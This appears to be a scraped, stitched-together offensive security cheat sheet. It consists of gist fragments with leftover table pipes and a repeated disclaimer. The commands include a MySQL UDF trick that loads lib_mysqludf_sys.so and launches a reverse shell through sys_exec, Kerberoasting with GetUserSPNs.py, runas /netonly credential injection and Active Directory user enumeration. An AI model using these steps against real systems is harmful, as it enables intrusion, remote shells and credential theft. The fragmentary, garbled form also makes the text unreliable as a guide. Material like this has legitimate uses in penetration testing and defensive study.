Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
mysql> use mysql; | |
mysql> create table test(line blob); | |
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
mysql> select sys_exec('./reverse_shell &'); |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
======================================================================================================================== | |
Kerberos Attacks | |
======================================================================================================================== | |
[+] Kerbose attack | |
./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin |
# Enumeration | |
# Credential Injection | |
runas.exe /netonly /user:<domain>\<username> cmd.exe | |
# enumeration users | |
users | |
net user /domain |
Note: I did not author this, i found it somehwere.